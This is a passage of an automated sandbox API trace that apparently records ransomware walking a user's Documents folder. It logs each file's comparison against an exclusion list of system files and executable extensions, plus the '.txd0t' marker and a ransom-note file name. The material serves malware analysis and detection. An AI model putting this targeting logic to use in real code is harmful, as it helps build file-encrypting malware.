(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.673] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.673] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.673] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.688] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.688] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" [0074.688] SetEvent (hEvent=0x3fc) returned 1 [0074.688] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ab2080, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0x976cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ebe8, ftLastWriteTime.dwLowDateTime=0x976cfd20, ftLastWriteTime.dwHighDateTime=0x1d5ebe8, nFileSizeHigh=0x0, nFileSizeLow=0x6558, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="JzVy_5xEKQ.xlsx", cAlternateFileName="JZVY_5~1.XLS")) returned 1 [0074.688] StrCmpW (psz1="JzVy_5xEKQ.xlsx", psz2=".") returned 1 [0074.688] StrCmpW (psz1="JzVy_5xEKQ.xlsx", psz2="..") returned 1 [0074.688] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.688] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.688] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="JzVy_5xEKQ.xlsx", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" [0074.688] PathFindExtensionW (pszPath="JzVy_5xEKQ.xlsx") returned=".xlsx" [0074.689] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="bootsect.bak") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="iconcache.db") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="thumbs.db") returned -1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2=" ransomware ") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2=" ransom ") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="debug.txt") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="boot.ini") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="desktop.ini") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="autorun.inf") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="ntuser.dat") returned -1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="ntldr") returned -1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="ntdetect.com") returned -1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="bootfont.bin") returned 1 [0074.689] StrCmpIW (psz1="JzVy_5xEKQ.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.689] PathFindExtensionW (pszPath="JzVy_5xEKQ.xlsx") returned=".xlsx" [0074.689] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.689] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.689] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.689] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.696] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.696] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" [0074.696] SetEvent (hEvent=0x3fc) returned 1 [0074.696] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03379e0, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x7f85f110, ftLastAccessTime.dwHighDateTime=0x1d5ec9e, ftLastWriteTime.dwLowDateTime=0x7f85f110, ftLastWriteTime.dwHighDateTime=0x1d5ec9e, nFileSizeHigh=0x0, nFileSizeLow=0xbaa6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="M24gnx.pps", cAlternateFileName="")) returned 1 [0074.696] StrCmpW (psz1="M24gnx.pps", psz2=".") returned 1 [0074.696] StrCmpW (psz1="M24gnx.pps", psz2="..") returned 1 [0074.696] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.696] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.696] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="M24gnx.pps", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" [0074.696] PathFindExtensionW (pszPath="M24gnx.pps") returned=".pps" [0074.696] StrCmpW (psz1=".pps", psz2=".txd0t") returned -1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="bootsect.bak") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="iconcache.db") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="thumbs.db") returned -1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2=" ransomware ") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2=" ransom ") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="debug.txt") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="boot.ini") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="desktop.ini") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="autorun.inf") returned 1 [0074.696] StrCmpIW (psz1="M24gnx.pps", psz2="ntuser.dat") returned -1 [0074.697] StrCmpIW (psz1="M24gnx.pps", psz2="ntldr") returned -1 [0074.697] StrCmpIW (psz1="M24gnx.pps", psz2="ntdetect.com") returned -1 [0074.697] StrCmpIW (psz1="M24gnx.pps", psz2="bootfont.bin") returned 1 [0074.697] StrCmpIW (psz1="M24gnx.pps", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.697] PathFindExtensionW (pszPath="M24gnx.pps") returned=".pps" [0074.697] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pps") returned 0x0 [0074.697] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.697] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.697] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.705] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.705] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" [0074.705] SetEvent (hEvent=0x3fc) returned 1 [0074.705] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eeea7d0, ftCreationTime.dwHighDateTime=0x1d5e48e, ftLastAccessTime.dwLowDateTime=0xdb33cc00, ftLastAccessTime.dwHighDateTime=0x1d5e1b6, ftLastWriteTime.dwLowDateTime=0xdb33cc00, ftLastWriteTime.dwHighDateTime=0x1d5e1b6, nFileSizeHigh=0x0, nFileSizeLow=0x14590, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MXMHgMI.ods", cAlternateFileName="")) returned 1 [0074.705] StrCmpW (psz1="MXMHgMI.ods", psz2=".") returned 1 [0074.705] StrCmpW (psz1="MXMHgMI.ods", psz2="..") returned 1 [0074.705] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.705] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.705] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="MXMHgMI.ods", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" [0074.705] PathFindExtensionW (pszPath="MXMHgMI.ods") returned=".ods" [0074.705] StrCmpW (psz1=".ods", psz2=".txd0t") returned -1 [0074.705] StrCmpIW (psz1="MXMHgMI.ods", psz2="bootsect.bak") returned 1 [0074.705] StrCmpIW (psz1="MXMHgMI.ods", psz2="iconcache.db") returned 1 [0074.705] StrCmpIW (psz1="MXMHgMI.ods", psz2="thumbs.db") returned -1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2=" ransomware ") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2=" ransom ") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="debug.txt") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="boot.ini") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="desktop.ini") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="autorun.inf") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="ntuser.dat") returned -1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="ntldr") returned -1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="ntdetect.com") returned -1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="bootfont.bin") returned 1 [0074.706] StrCmpIW (psz1="MXMHgMI.ods", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.706] PathFindExtensionW (pszPath="MXMHgMI.ods") returned=".ods" [0074.706] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ods") returned 0x0 [0074.706] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.706] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.706] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.714] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.714] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" [0074.714] SetEvent (hEvent=0x3fc) returned 1 [0074.714] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9261d20, ftCreationTime.dwHighDateTime=0x1d5eff2, ftLastAccessTime.dwLowDateTime=0xf3d4d290, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0xf3d4d290, ftLastWriteTime.dwHighDateTime=0x1d5e25b, nFileSizeHigh=0x0, nFileSizeLow=0x1db7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Uct9z.odt", cAlternateFileName="")) returned 1 [0074.714] StrCmpW (psz1="Uct9z.odt", psz2=".") returned 1 [0074.714] StrCmpW (psz1="Uct9z.odt", psz2="..") returned 1 [0074.714] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="Uct9z.odt", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" [0074.715] PathFindExtensionW (pszPath="Uct9z.odt") returned=".odt" [0074.715] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="bootsect.bak") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="iconcache.db") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="thumbs.db") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2=" ransomware ") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2=" ransom ") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="debug.txt") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="boot.ini") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="desktop.ini") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="autorun.inf") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="ntuser.dat") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="ntldr") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="ntdetect.com") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="bootfont.bin") returned 1 [0074.715] StrCmpIW (psz1="Uct9z.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.715] PathFindExtensionW (pszPath="Uct9z.odt") returned=".odt" [0074.715] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0074.715] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.715] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.715] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.724] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.724] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt" [0074.724] SetEvent (hEvent=0x3fc) returned 1 [0074.724] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d75360, ftCreationTime.dwHighDateTime=0x1d5e92c, ftLastAccessTime.dwLowDateTime=0xbf44d190, ftLastAccessTime.dwHighDateTime=0x1d5e0d2, ftLastWriteTime.dwLowDateTime=0xbf44d190, ftLastWriteTime.dwHighDateTime=0x1d5e0d2, nFileSizeHigh=0x0, nFileSizeLow=0x1478f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VcL01ptYXVDK5.rtf", cAlternateFileName="VCL01P~1.RTF")) returned 1 [0074.724] StrCmpW (psz1="VcL01ptYXVDK5.rtf", psz2=".") returned 1 [0074.724] StrCmpW (psz1="VcL01ptYXVDK5.rtf", psz2="..") returned 1 [0074.724] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.724] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VcL01ptYXVDK5.rtf", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" [0074.725] PathFindExtensionW (pszPath="VcL01ptYXVDK5.rtf") returned=".rtf" [0074.725] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="bootsect.bak") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="iconcache.db") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="thumbs.db") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2=" ransomware ") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2=" ransom ") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="debug.txt") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="boot.ini") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="desktop.ini") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="autorun.inf") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="ntuser.dat") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="ntldr") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="ntdetect.com") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="bootfont.bin") returned 1 [0074.725] StrCmpIW (psz1="VcL01ptYXVDK5.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.725] PathFindExtensionW (pszPath="VcL01ptYXVDK5.rtf") returned=".rtf" [0074.725] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0074.725] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.725] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.725] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.731] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.731] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf" [0074.731] SetEvent (hEvent=0x3fc) returned 1 [0074.731] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3daa4410, ftCreationTime.dwHighDateTime=0x1d5ec82, ftLastAccessTime.dwLowDateTime=0x5ea14610, ftLastAccessTime.dwHighDateTime=0x1d5ea92, ftLastWriteTime.dwLowDateTime=0x5ea14610, ftLastWriteTime.dwHighDateTime=0x1d5ea92, nFileSizeHigh=0x0, nFileSizeLow=0xa40f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VSf1IL-6_DKVGroXOg.docx", cAlternateFileName="VSF1IL~1.DOC")) returned 1 [0074.732] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2=".") returned 1 [0074.732] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="..") returned 1 [0074.732] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") 